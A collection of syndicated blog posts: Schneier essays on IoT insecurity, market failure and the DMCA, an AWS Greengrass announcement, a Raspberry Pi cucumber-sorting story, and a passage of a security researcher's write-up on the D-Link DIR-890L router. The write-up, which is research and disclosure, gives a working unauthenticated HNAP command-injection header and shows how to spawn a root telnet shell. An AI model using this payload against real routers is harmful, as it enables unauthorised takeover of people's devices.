Truism No. 2: Most software is poorly written and insecure.

If complexity isn’t enough, we compound the problem by producing lousy software. Well-written software, like the kind found in airplane avionics, is both expensive and time-consuming to produce. We don’t want that. For the most part, poorly written software has been good enough. We’d all rather live with buggy software than pay the prices good software would require. We don’t mind if our games crash regularly, or our business applications act weird once in a while. Because software has been largely benign, it hasn’t mattered. This has permeated the industry at all levels. At universities, we don’t teach how to code well. Companies don’t reward quality code in the same way they reward fast and cheap. And we consumers don’t demand it.

But poorly written software is riddled with bugs, sometimes as many as one per 1,000 lines of code. Some of them are inherent in the complexity of the software, but most are programming mistakes. Not all bugs are vulnerabilities, but some are.

Truism No. 3: Connecting everything to each other via the internet will expose new vulnerabilities.

The more we network things together, the more vulnerabilities on one thing will affect other things. On October 21, vulnerabilities in a wide variety of embedded devices were all harnessed together to create what hackers call a botnet. This botnet was used to launch a distributed denial-of-service attack against a company called Dyn. Dyn provided a critical internet function for many major internet sites. So when Dyn went down, so did all those popular websites.

These chains of vulnerabilities are everywhere. In 2012, journalist Mat Honan suffered a massive personal hack because of one of them. A vulnerability in his Amazon account allowed hackers to get into his Apple account, which allowed them to get into his Gmail account. And in 2013, the Target Corporation was hacked by someone stealing credentials from its HVAC contractor.

Vulnerabilities like these are particularly hard to fix, because no one system might actually be at fault. It might be the insecure interaction of two individually secure systems.

Truism No. 4: Everybody has to stop the best attackers in the world.

One of the most powerful properties of the internet is that it allows things to scale. This is true for our ability to access data or control systems or do any of the cool things we use the internet for, but it’s also true for attacks. In general, fewer attackers can do more damage because of better technology. It’s not just that these modern attackers are more efficient, it’s that the internet allows attacks to scale to a degree impossible without computers and networks.

This is fundamentally different from what we’re used to. When securing my home against burglars, I am only worried about the burglars who live close enough to my home to consider robbing me. The internet is different. When I think about the security of my network, I have to be concerned about the best attacker possible, because he’s the one who’s going to create the attack tool that everyone else will use. The attacker that discovered the vulnerability used to attack Dyn released the code to the world, and within a week there were a dozen attack tools using it.

Truism No. 5: Laws inhibit security research.

The Digital Millennium Copyright Act is a terrible law that fails at its purpose of preventing widespread piracy of movies and music. To make matters worse, it contains a provision that has critical side effects. According to the law, it is a crime to bypass security mechanisms that protect copyrighted work, even if that bypassing would otherwise be legal. Since all software can be copyrighted, it is arguably illegal to do security research on these devices and to publish the result.

Although the exact contours of the law are arguable, many companies are using this provision of the DMCA to threaten researchers who expose vulnerabilities in their embedded systems. This instills fear in researchers, and has a chilling effect on research, which means two things: (1) Vendors of these devices are more likely to leave them insecure, because no one will notice and they won’t be penalized in the market, and (2) security engineers don’t learn how to do security better.
Unfortunately, companies generally like the DMCA. The provisions against reverse-engineering spare them the embarrassment of having their shoddy security exposed. It also allows them to build proprietary systems that lock out competition. (This is an important one. Right now, your toaster cannot force you to only buy a particular brand of bread. But because of this law and an embedded computer, your Keurig coffee maker can force you to buy a particular brand of coffee.)

**********
In general, there are two basic paradigms of security. We can either try to secure something well the first time, or we can make our security agile. The first paradigm comes from the world of dangerous things: from planes, medical devices, buildings. It’s the paradigm that gives us secure design and secure engineering, security testing and certifications, professional licensing, detailed preplanning and complex government approvals, and long times-to-market. It’s security for a world where getting it right is paramount because getting it wrong means people dying.

The second paradigm comes from the fast-moving and heretofore largely benign world of software. In this paradigm, we have rapid prototyping, on-the-fly updates, and continual improvement. In this paradigm, new vulnerabilities are discovered all the time and security disasters regularly happen. Here, we stress survivability, recoverability, mitigation, adaptability, and muddling through. This is security for a world where getting it wrong is okay, as long as you can respond fast enough.

These two worlds are colliding. They’re colliding in our cars -­ literally -­ in our medical devices, our building control systems, our traffic control systems, and our voting machines. And although these paradigms are wildly different and largely incompatible, we need to figure out how to make them work together.

So far, we haven’t done very well. We still largely rely on the first paradigm for the dangerous computers in cars, airplanes, and medical devices. As a result, there are medical systems that can’t have security patches installed because that would invalidate their government approval. In 2015, Chrysler recalled 1.4 million cars to fix a software vulnerability. In September 2016, Tesla remotely sent a security patch to all of its Model S cars overnight. Tesla sure sounds like it’s doing things right, but what vulnerabilities does this remote patch feature open up?

**********
Until now we’ve largely left computer security to the market. Because the computer and network products we buy and use are so lousy, an enormous after-market industry in computer security has emerged. Governments, companies, and people buy the security they think they need to secure themselves. We’ve muddled through well enough, but the market failures inherent in trying to secure this world-size robot will soon become too big to ignore.

Markets alone can’t solve our security problems. Markets are motivated by profit and short-term goals at the expense of society. They can’t solve collective-action problems. They won’t be able to deal with economic externalities, like the vulnerabilities in DVRs that resulted in Twitter going offline. And we need a counterbalancing force to corporate power.

This all points to policy. While the details of any computer-security system are technical, getting the technologies broadly deployed is a problem that spans law, economics, psychology, and sociology. And getting the policy right is just as important as getting the technology right because, for internet security to work, law and technology have to work together. This is probably the most important lesson of Edward Snowden’s NSA disclosures. We already knew that technology can subvert law. Snowden demonstrated that law can also subvert technology. Both fail unless each work. It’s not enough to just let technology do its thing.

Any policy changes to secure this world-size robot will mean significant government regulation. I know it’s a sullied concept in today’s world, but I don’t see any other possible solution. It’s going to be especially difficult on the internet, where its permissionless nature is one of the best things about it and the underpinning of its most world-changing innovations. But I don’t see how that can continue when the internet can affect the world in a direct and physical manner.

**********

I have a proposal: a new government regulatory agency. Before dismissing it out of hand, please hear me out.

We have a practical problem when it comes to internet regulation. There’s no government structure to tackle this at a systemic level. Instead, there’s a fundamental mismatch between the way government works and the way this technology works that makes dealing with this problem impossible at the moment.

Government operates in silos. In the U.S., the FAA regulates aircraft. The NHTSA regulates cars. The FDA regulates medical devices. The FCC regulates communications devices. The FTC protects consumers in the face of “unfair” or “deceptive” trade practices. Even worse, who regulates data can depend on how it is used. If data is used to influence a voter, it’s the Federal Election Commission’s jurisdiction. If that same data is used to influence a consumer, it’s the FTC’s. Use those same technologies in a school, and the Department of Education is now in charge. Robotics will have its own set of problems, and no one is sure how that is going to be regulated. Each agency has a different approach and different rules. They have no expertise in these new issues, and they are not quick to expand their authority for all sorts of reasons.

Compare that with the internet. The internet is a freewheeling system of integrated objects and networks. It grows horizontally, demolishing old technological barriers so that people and systems that never previously communicated now can. Already, apps on a smartphone can log health information, control your energy use, and communicate with your car. That’s a set of functions that crosses jurisdictions of at least four different government agencies, and it’s only going to get worse.

Our world-size robot needs to be viewed as a single entity with millions of components interacting with each other. Any solutions here need to be holistic. They need to work everywhere, for everything. Whether we’re talking about cars, drones, or phones, they’re all computers.

This has lots of precedent. Many new technologies have led to the formation of new government regulatory agencies. Trains did, cars did, airplanes did. Radio led to the formation of the Federal Radio Commission, which became the FCC. Nuclear power led to the formation of the Atomic Energy Commission, which eventually became the Department of Energy. The reasons were the same in every case. New technologies need new expertise because they bring with them new challenges. Governments need a single agency to house that new expertise, because its applications cut across several preexisting agencies. It’s less that the new agency needs to regulate -­ although that’s often a big part of it -­ and more that governments recognize the importance of the new technologies.

The internet has famously eschewed formal regulation, instead adopting a multi-stakeholder model of academics, businesses, governments, and other interested parties. My hope is that we can keep the best of this approach in any regulatory agency, looking more at the new U.S. Digital Service or the 18F office inside the General Services Administration. Both of those organizations are dedicated to providing digital government services, and both have collected significant expertise by bringing people in from outside of government, and both have learned how to work closely with existing agencies. Any internet regulatory agency will similarly need to engage in a high level of collaborate regulation -­ both a challenge and an opportunity.

I don’t think any of us can predict the totality of the regulations we need to ensure the safety of this world, but here’s a few. We need government to ensure companies follow good security practices: testing, patching, secure defaults -­ and we need to be able to hold companies liable when they fail to do these things. We need government to mandate strong personal data protections, and limitations on data collection and use. We need to ensure that responsible security research is legal and well-funded. We need to enforce transparency in design, some sort of code escrow in case a company goes out of business, and interoperability between devices of different manufacturers, to counterbalance the monopolistic effects of interconnected technologies. Individuals need the right to take their data with them. And internet-enabled devices should retain some minimal functionality if disconnected from the internet

I’m not the only one talking about this. I’ve seen proposals for a National Institutes of Health analog for cybersecurity. University of Washington law professor Ryan Calo has proposed a Federal Robotics Commission. I think it needs to be broader: maybe a Department of Technology Policy.

Of course there will be problems. There’s a lack of expertise in these issues inside government. There’s a lack of willingness in government to do the hard regulatory work. Industry is worried about any new bureaucracy: both that it will stifle innovation by regulating too much and that it will be captured by industry and regulate too little. A domestic regulatory agency will have to deal with the fundamentally international nature of the problem.

But government is the entity we use to solve problems like this. Governments have the scope, scale, and balance of interests to address the problems. It’s the institution we’ve built to adjudicate competing social interests and internalize market externalities. Left to their own devices, the market simply can’t. That we’re currently in the middle of an era of low government trust, where many of us can’t imagine government doing anything positive in an area like this, is to our detriment.

Here’s the thing: Governments will get involved, regardless. The risks are too great, and the stakes are too high. Government already regulates dangerous physical systems like cars and medical devices. And nothing motivates the U.S. government like fear. Remember 2001? A nominally small-government Republican president created the Office of Homeland Security 11 days after the terrorist attacks: a rushed and ill-thought-out decision that we’ve been trying to fix for over a decade. A fatal disaster will similarly spur our government into action, and it’s unlikely to be well-considered and thoughtful action. Our choice isn’t between government involvement and no government involvement. Our choice is between smarter government involvement and stupider government involvement. We have to start thinking about this now. Regulations are necessary, important, and complex; and they’re coming. We can’t afford to ignore these issues until it’s too late.

We also need to start disconnecting systems. If we cannot secure complex systems to the level required by their real-world capabilities, then we must not build a world where everything is computerized and interconnected.

There are other models. We can enable local communications only. We can set limits on collected and stored data. We can deliberately design systems that don’t interoperate with each other. We can deliberately fetter devices, reversing the current trend of turning everything into a general-purpose computer. And, most important, we can move toward less centralization and more distributed systems, which is how the internet was first envisioned.

This might be a heresy in today’s race to network everything, but large, centralized systems are not inevitable. The technical elites are pushing us in that direction, but they really don’t have any good supporting arguments other than the profits of their ever-growing multinational corporations.

But this will change. It will change not only because of security concerns, it will also change because of political concerns. We’re starting to chafe under the worldview of everything producing data about us and what we do, and that data being available to both governments and corporations. Surveillance capitalism won’t be the business model of the internet forever. We need to change the fabric of the internet so that evil governments don’t have the tools to create a horrific totalitarian state. And while good laws and regulations in Western democracies are a great second line of defense, they can’t be our only line of defense.

My guess is that we will soon reach a high-water mark of computerization and connectivity, and that afterward we will make conscious decisions about what and how we decide to interconnect. But we’re still in the honeymoon phase of connectivity. Governments and corporations are punch-drunk on our data, and the rush to connect everything is driven by an even greater desire for power and market share. One of the presentations released by Edward Snowden contained the NSA mantra: “Collect it all.” A similar mantra for the internet today might be: “Connect it all.”

The inevitable backlash will not be driven by the market. It will be deliberate policy decisions that put the safety and welfare of society above individual corporations and industries. It will be deliberate policy decisions that prioritize the security of our systems over the demands of the FBI to weaken them in order to make their law-enforcement jobs easier. It’ll be hard policy for many to swallow, but our safety will depend on it.

**********

The scenarios I’ve outlined, both the technological and economic trends that are causing them and the political changes we need to make to start to fix them, come from my years of working in internet-security technology and policy. All of this is informed by an understanding of both technology and policy. That turns out to be critical, and there aren’t enough people who understand both.

This brings me to my final plea: We need more public-interest technologists.

Over the past couple of decades, we’ve seen examples of getting internet-security policy badly wrong. I’m thinking of the FBI’s “going dark” debate about its insistence that computer devices be designed to facilitate government access, the “vulnerability equities process” about when the government should disclose and fix a vulnerability versus when it should use it to attack other systems, the debacle over paperless touch-screen voting machines, and the DMCA that I discussed above. If you watched any of these policy debates unfold, you saw policy-makers and technologists talking past each other.

Our world-size robot will exacerbate these problems. The historical divide between Washington and Silicon Valley -­ the mistrust of governments by tech companies and the mistrust of tech companies by governments ­- is dangerous.

We have to fix this. Getting IoT security right depends on the two sides working together and, even more important, having people who are experts in each working on both. We need technologists to get involved in policy, and we need policy-makers to get involved in technology. We need people who are experts in making both technology and technological policy. We need technologists on congressional staffs, inside federal agencies, working for NGOs, and as part of the press. We need to create a viable career path for public-interest technologists, much as there already is one for public-interest attorneys. We need courses, and degree programs in colleges, for people interested in careers in public-interest technology. We need fellowships in organizations that need these people. We need technology companies to offer sabbaticals for technologists wanting to go down this path. We need an entire ecosystem that supports people bridging the gap between technology and law. We need a viable career path that ensures that even though people in this field won’t make as much as they would in a high-tech start-up, they will have viable careers. The security of our computerized and networked future ­ meaning the security of ourselves, families, homes, businesses, and communities ­ depends on it.

This plea is bigger than security, actually. Pretty much all of the major policy debates of this century will have a major technological component. Whether it’s weapons of mass destruction, robots drastically affecting employment, climate change, food safety, or the increasing ubiquity of ever-shrinking drones, understanding the policy means understanding the technology. Our society desperately needs technologists working on the policy. The alternative is bad policy.

**********

The world-size robot is less designed than created. It’s coming without any forethought or architecting or planning; most of us are completely unaware of what we’re building. In fact, I am not convinced we can actually design any of this. When we try to design complex sociotechnical systems like this, we are regularly surprised by their emergent properties. The best we can do is observe and channel these properties as best we can.

Market thinking sometimes makes us lose sight of the human choices and autonomy at stake. Before we get controlled ­ or killed ­ by the world-size robot, we need to rebuild confidence in our collective governance institutions. Law and policy may not seem as cool as digital tech, but they’re also places of critical innovation. They’re where we collectively bring about the world we want to live in.

While I might sound like a Cassandra, I’m actually optimistic about our future. Our society has tackled bigger problems than this one. It takes work and it’s not easy, but we eventually find our way clear to make the hard choices necessary to solve our real problems.

The world-size robot we’re building can only be managed responsibly if we start making real choices about the interconnected world we live in. Yes, we need security systems as robust as the threat landscape. But we also need laws that effectively regulate these dangerous technologies. And, more generally, we need to make moral, ethical, and political decisions on how those systems should work. Until now, we’ve largely left the internet alone. We gave programmers a special right to code cyberspace as they saw fit. This was okay because cyberspace was separate and relatively unimportant: That is, it didn’t matter. Now that that’s changed, we can no longer give programmers and the companies they work for this power. Those moral, ethical, and political decisions need, somehow, to be made by everybody. We need to link people with the same zeal that we are currently linking machines. “Connect it all” must be countered with “connect us all.”

This essay previously appeared in New York Magazine.

AWS Greengrass – Ubiquitous, Real-World Computing

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-greengrass-ubiquitous-real-world-computing/

Computing and data processing within the confines of a data center or office is easy. You can generally count on good connectivity and a steady supply of electricity, and you have access to as much on-premises or cloud-based storage and compute power as you need. The situation is much different out in the real world. Connectivity can be intermittent, unreliable, and limited in speed and scale. Power is at a premium, putting limits on how much storage and compute power can be brought in to play.

Lots of interesting and potentially valuable data is present out in the field, if only it could be collected, processed, and turned into actionable intelligence. This data could be located miles below the surface of the Earth in a mine or an oil well, in a sensitive & safety-critical location like a hospital or a factory, or even on another planet (hello, Curiosity).

Our customers are asking for a way to use the scale and power of the AWS Cloud to help them to do local processing under these trying conditions. First, they want to build systems that measure, sense, and act upon the data locally. Then they want to bring cloud-like, local intelligence to bear on the data, implementing local actions that are interdependent and coordinated. To make this even more challenging they want to do make use of any available local processing and storage resources, while also connecting to specialized sensors and peripherals.

Introducing AWS Greengrass
I’d like to tell you about AWS Greengrass. This new service is designed to allow you to address the challenges that I outlined above by extending the AWS programming model to small, simple, field-based devices.

Greengrass builds on AWS IoT and AWS Lambda, and can also access other AWS services. it is built for offline operation and greatly simplifies the implementation of local processing. Code running in the field can collect, filter, and aggregate freshly collected data and then push it up to the cloud for long-term storage and further aggregation. Further, code running in the field can also take action very quickly, even in cases where connectivity to the cloud is temporarily unavailable.

If you are already developing embedded systems for small devices, you will now be able to make use of modern, cloud-aware development tools and workflows. You can write and test your code in the cloud and then deploy it locally. You can write Python code that responds to device events and you can make use of MQTT-based pub/sub messaging for communication.

Greengrass has two constituent parts, the Greengrass Core (GGC) and the IoT Device SDK. Both of these components run on your own hardware, out in the field.

Greengrass Core is designed to run on devices that have at least 128 MB of memory and an x86 or ARM CPU running at 1 GHz or better, and can take advantage of additional resources if available. It runs Lambda functions locally, interacts with the AWS Cloud, manages security & authentication, and communicates with the other devices under its purview.

The IoT Device SDK is used to build the applications that run on the devices that connect to the device that hosts the core (generally via a LAN or other local connection). These applications will capture data from sensors, subscribe to MQTT topics, and use AWS IoT device shadows to store and retrieve state information.

Using AWS GreenGrass
You will be able to set up and manage many aspects of Greengrass through the AWS Management Console, the AWS APIs, and the AWS Command Line Interface (CLI).

You will be able to register new hub devices, configure the desired set of Lambda functions, and create a deployment package for delivery to the device. From there, you will associate the lightweight devices with the hub.

Now in Preview
We are launching a limited preview of AWS Greengrass today and you can [[sign up now]] if you would like to participate.

Each AWS customer will be able to use up 3 devices for one year at no charge. Beyond that, the monthly cost for each active Greengrass Core is $0.16 ($1.49 per year) for up to 10,000 devices.

Jeff;

 

Research into IoT Security Is Finally Legal

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/11/research_into_i.html

For years, the DMCA has been used to stifle legitimate research into the security of embedded systems. Finally, the research exemption to the DMCA is in effect (for two years, but we can hope it’ll be extended forever).

Security Economics of the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/10/security_econom_1.html

Brian Krebs is a popular reporter on the cybersecurity beat. He regularly exposes cybercriminals and their tactics, and consequently is regularly a target of their ire. Last month, he wrote about an online attack-for-hire service that resulted in the arrest of the two proprietors. In the aftermath, his site was taken down by a massive DDoS attack.

In many ways, this is nothing new. Distributed denial-of-service attacks are a family of attacks that cause websites and other Internet-connected systems to crash by overloading them with traffic. The “distributed” part means that other insecure computers on the Internet — sometimes in the millions­ — are recruited to a botnet to unwittingly participate in the attack. The tactics are decades old; DDoS attacks are perpetrated by lone hackers trying to be annoying, criminals trying to extort money, and governments testing their tactics. There are defenses, and there are companies that offer DDoS mitigation services for hire.

Basically, it’s a size vs. size game. If the attackers can cobble together a fire hose of data bigger than the defender’s capability to cope with, they win. If the defenders can increase their capability in the face of attack, they win.

What was new about the Krebs attack was both the massive scale and the particular devices the attackers recruited. Instead of using traditional computers for their botnet, they used CCTV cameras, digital video recorders, home routers, and other embedded computers attached to the Internet as part of the Internet of Things.

Much has been written about how the IoT is wildly insecure. In fact, the software used to attack Krebs was simple and amateurish. What this attack demonstrates is that the economics of the IoT mean that it will remain insecure unless government steps in to fix the problem. This is a market failure that can’t get fixed on its own.

Our computers and smartphones are as secure as they are because there are teams of security engineers working on the problem. Companies like Microsoft, Apple, and Google spend a lot of time testing their code before it’s released, and quickly patch vulnerabilities when they’re discovered. Those companies can support such teams because those companies make a huge amount of money, either directly or indirectly, from their software­ — and, in part, compete on its security. This isn’t true of embedded systems like digital video recorders or home routers. Those systems are sold at a much lower margin, and are often built by offshore third parties. The companies involved simply don’t have the expertise to make them secure.

Even worse, most of these devices don’t have any way to be patched. Even though the source code to the botnet that attacked Krebs has been made public, we can’t update the affected devices. Microsoft delivers security patches to your computer once a month. Apple does it just as regularly, but not on a fixed schedule. But the only way for you to update the firmware in your home router is to throw it away and buy a new one.

The security of our computers and phones also comes from the fact that we replace them regularly. We buy new laptops every few years. We get new phones even more frequently. This isn’t true for all of the embedded IoT systems. They last for years, even decades. We might buy a new DVR every five or ten years. We replace our refrigerator every 25 years. We replace our thermostat approximately never. Already the banking industry is dealing with the security problems of Windows 95 embedded in ATMs. This same problem is going to occur all over the Internet of Things.

The market can’t fix this because neither the buyer nor the seller cares. Think of all the CCTV cameras and DVRs used in the attack against Brian Krebs. The owners of those devices don’t care. Their devices were cheap to buy, they still work, and they don’t even know Brian. The sellers of those devices don’t care: they’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution because the insecurity is what economists call an externality: it’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

What this all means is that the IoT will remain insecure unless government steps in and fixes the problem. When we have market failures, government is the only solution. The government could impose security regulations on IoT manufacturers, forcing them to make their devices secure even though their customers don’t care. They could impose liabilities on manufacturers, allowing people like Brian Krebs to sue them. Any of these would raise the cost of insecurity and give companies incentives to spend money making their devices secure.

Of course, this would only be a domestic solution to an international problem. The Internet is global, and attackers can just as easily build a botnet out of IoT devices from Asia as from the United States. Long term, we need to build an Internet that is resilient against attacks like this. But that’s a long time coming. In the meantime, you can expect more attacks that leverage insecure IoT devices.

This essay previously appeared on Vice Motherboard.

Slashdot thread.

Here are some of the things that are vulnerable.

EDITED TO ADD (10/17: DARPA is looking for IoT-security ideas from the private sector.

Now with added cucumbers

Post Syndicated from Liz Upton original https://www.raspberrypi.org/blog/now-added-cucumbers/

Working here at Pi Towers, I’m always a little frustrated by not being able to share the huge number of commercial businesses’ embedded projects that use Raspberry Pis. (About a third of the Pis we sell go to businesses.) We don’t get to feature many of them on the blog; many organisations don’t want their work replicated by competitors, or aren’t prepared for customers and competitors to see how inexpensively they’re able to automate tasks. Every now and then, though, a company is happy to share what they’re using Pis for.

cucumber-farmer-3

Makoto Koike, centre, with his parents on the family cucumber farm

Here’s a great example: a cucumber farm in Japan, which is using a Raspberry Pi to sort thorny cucumbers, saving the farmer eight to nine hours’ manual work a day.

Makoto Koike is the son of farmers, who works as an embedded systems designer for the Japanese car industry. He started helping out at his parents’ cucumber farm (which he will be taking over when they retire), and spotted a process that was ripe for automation.

cucumber-farmer-7

Cucumbers from the Makotos’ farm

At the Makotos’ farm, cucumbers are graded into nine categories: the straightest, thickest, freshest, most vivid cucumbers (which must have plenty of characteristic spurs) are the best, and can be sold at the highest price. Makoto-san’s mother was in charge of sorting the cucumbers every day, which took eight hours at the peak of the harvest. Makoto-san had an epiphany after reading about Google’s AlphaGo beating the world number one professional Go player. He realised that machine learning and deep learning meant the sorting process could be automated, so he built a process using Google’s open-source machine learning library, TensorFlow, and some machinery to process the cucumbers into graded batches.

cucumber-farmer-10

Sorting in action

cucumber-farmer-6

Camera interface

Google have put together a diagram showing how the system works:

cucumber-farmer-14

There are difficulties in building this sort of system, not least the 7000 cucumbers, pre-graded by his mother, that Makoto-san had to photograph and label over a period of three months to give the model material to train with. He says:

“When I did a validation with the test images, the recognition accuracy exceeded 95%. But if you apply the system with real use cases, the accuracy drops down to about 70%. I suspect the neural network model has the issue of “overfitting” (the phenomenon in neural networks where the model is trained to fit only the small training dataset) because of the insufficient number of training images.”

Still, it’s an impressive feat, and a real-world >95% accuracy rate is not unfeasible with a big enough data set. We’d be interested to see how the setup progresses, especially as more automation is added; right now, cucumbers are added to the processing hopper by hand, and a human has to interact with the touchscreen grading panel. Here’s the system at work:

TensorFlow powered cucumber sorter by Makoto Koike

Uploaded by Kazunori Sato on 2016-08-05.

We’re hoping to see some updates from the Makoto family as the system evolves. And in the meantime, if you have an embedded project you’d like to share with us, let us know in the comments!

 

The post Now with added cucumbers appeared first on Raspberry Pi.

Hacking the D-Link DIR-890L

Post Syndicated from Craig original http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/

The past 6 months have been incredibly busy, and I haven’t been keeping up with D-Link’s latest shenanigans. In need of some entertainment, I went to their web page today and was greeted by this atrocity:
D-Link's $300 DIR-890L routerD-Link’s $300 DIR-890L router
I think the most “insane” thing about this router is that it’s running the same buggy firmware that D-Link has been cramming in their routers for years…and the hits just keep on coming.

OK, let’s do the usual: grab the latest firmware release, binwalk it and see what we’ve got:

DECIMAL HEXADECIMAL DESCRIPTION
——————————————————————————–
0 0x0 DLOB firmware header, boot partition: "dev=/dev/mtdblock/7"
116 0x74 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 4905376 bytes
1835124 0x1C0074 PackImg section delimiter tag, little endian size: 6345472 bytes; big endian size: 13852672 bytes
1835156 0x1C0094 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 13852268 bytes, 2566 inodes, blocksize: 131072 bytes, created: 2015-02-11 09:18:37

Looks like a pretty standard Linux firmware image, and if you’ve looked at any D-Link firmware over the past few years, you’ll probably recognize the root directory structure:

$ ls squashfs-root
bin dev etc home htdocs include lib mnt mydlink proc sbin sys tmp usr var www

All of the HTTP/UPnP/HNAP stuff is located under the htdocs directory. The most interesting file here is htdocs/cgibin, an ARM ELF binary which is executed by the web server for, well, just about everything: all CGI, UPnP, and HNAP related URLs are symlinked to this one binary:

$ ls -l htdocs/web/*.cgi
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/captcha.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/conntrack.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/dlapn.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/dlcfg.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/dldongle.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/fwup.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/fwupload.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/hedwig.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/pigwidgeon.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/seama.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/service.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/webfa_authentication.cgi -> /htdocs/cgibin
lrwxrwxrwx 1 eve eve 14 Mar 31 22:46 htdocs/web/webfa_authentication_logout.cgi -> /htdocs/cgibin

It’s been stripped of course, but there are plenty of strings to help us out. The first thing that main does is compare argv[0] against all known symlink names (captcha.cgi, conntrack.cgi, etc) to decide which action it is supposed to take:
"Staircase" code graph, typical of  if-else statements“Staircase” code graph, typical of if-else statements
Each of these comparisons are strcmp‘s against the expected symlink names:
Function handlers for various symlinksFunction handlers for various symlinks
This makes it easy to correlate each function handler to its respective symlink name and re-name the functions appropriately:
Renamed symlink function handlersRenamed symlink function handlers
Now that we’ve got some of the high-level functions identified, let’s start bug hunting. Other D-Link devices running essentially the same firmware have previously been exploited through both their HTTP and UPnP interfaces. However, the HNAP interface, which is handled by the hnap_main function in cgibin, seems to have been mostly overlooked.
HNAP (Home Network Administration Protocol) is a SOAP-based protocol, similar to UPnP, that is commonly used by D-Link’s “EZ” setup utilities to initially configure the router. Unlike UPnP however, all HNAP actions, with the exception of GetDeviceInfo (which is basically useless), require HTTP Basic authentication:

POST /HNAP1 HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWMEHZY+
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://purenetworks.com/HNAP1/AddPortMapping"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<AddPortMapping xmlns="http://purenetworks.com/HNAP1/">
<PortMappingDescription>foobar</PortMappingDescription>
<InternalClient>192.168.0.100</InternalClient>
<PortMappingProtocol>TCP</PortMappingProtocol>
<ExternalPort>1234</ExternalPort>
<InternalPort>1234</InternalPort>
</AddPortMapping>
</soap:Body>
</soap:Envelope>

The SOAPAction header is of particular importance in an HNAP request, because it specifies which HNAP action should be taken (AddPortMapping in the above example).
Since cgibin is executed as a CGI by the web server, hnap_main accesses HNAP request data, such as the SOAPAction header, via environment variables:
SOAPAction = getenv("HTTP_SOAPACTION");SOAPAction = getenv(“HTTP_SOAPACTION”);
Towards the end of hnap_main, there is a shell command being built dynamically with sprintf; this command is then executed via system:
sprintf(command, "sh %s%s.sh > /dev/console", "/var/run/", SOAPAction);sprintf(command, “sh %s%s.sh > /dev/console”, “/var/run/”, SOAPAction);
Clearly, hnap_main is using data from the SOAPAction header as part of the system command! This is a promising command injection bug, if the contents of the SOAPAction header aren’t being sanitized, and if we can get into this code block without authentication.
Going back to the beginning of hnap_main, one of the first checks it does is to see if the SOAPAction header is equal to the string http://purenetworks.com/HNAP1/GetDeviceSettings; if so, then it skips the authentication check. This is expected, as we’ve already established that the GetDeviceSettings action does not require authentication:
if(strstr(SOAPAction, "http://purenetworks.com/HNAP1/GetDeviceSettings") != NULL)if(strstr(SOAPAction, “http://purenetworks.com/HNAP1/GetDeviceSettings”) != NULL)
However, note that strstr is used for this check, which only indicates that the SOAPAction header contains the http://purenetworks.com/HNAP1/GetDeviceSettings string, not that the header equals that string.
So, if the SOAPAction header contains the string http://purenetworks.com/HNAP1/GetDeviceSettings, the code then proceeds to parse the action name (e.g., GetDeviceSettings) out of the header and remove any trailing double-quotes:
SOAPAction = strrchr(SOAPAction, '/');SOAPAction = strrchr(SOAPAction, ‘/’);
It is the action name (e.g., GetDeviceSettings), parsed out of the header by the above code, that is sprintf‘d into the command string executed by system.
Here’s the code in C, to help highlight the flaw in the above logic:

/* Grab a pointer to the SOAPAction header */
SOAPAction = getenv("HTTP_SOAPACTION");

/* Skip authentication if the SOAPAction header contains "http://purenetworks.com/HNAP1/GetDeviceSettings" */
if(strstr(SOAPAction, "http://purenetworks.com/HNAP1/GetDeviceSettings") == NULL)
{
/* do auth check */
}

/* Do a reverse search for the last forward slash in the SOAPAction header */
SOAPAction = strrchr(SOAPAction, ‘/’);
if(SOAPAction != NULL)
{
/* Point the SOAPAction pointer one byte beyond the last forward slash */
SOAPAction += 1;

/* Get rid of any trailing double quotes */
if(SOAPAction[strlen(SOAPAction)-1] == ‘"’)
{
SOAPAction[strlen(SOAPAction)-1] = ‘\0’;
}
}
else
{
goto failure_condition;
}

/* Build the command using the specified SOAPAction string and execute it */
sprintf(command, "sh %s%s.sh > /dev/console", "/var/run/", SOAPAction);
system(command);

The two important take-aways from this are:

There is no authentication check if the SOAPAction header contains the string http://purenetworks.com/HNAP1/GetDeviceSettings
The string passed to sprintf (and ultimately system) is everything after the last forward slash in the SOAPAction header

Thus, we can easily format a SOAPAction header that both satisfies the “no auth” check, and allows us to pass an arbitrary string to system:

SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`"

The http://purenetworks.com/HNAP1/GetDeviceSettings portion of the header satisfies the “no auth” check, while the `reboot` string ends up getting passed to system:

system("sh /var/run/`reboot`.sh > /dev/console");

Replacing reboot with telnetd spawns a telnet server that provides an unauthenticated root shell:

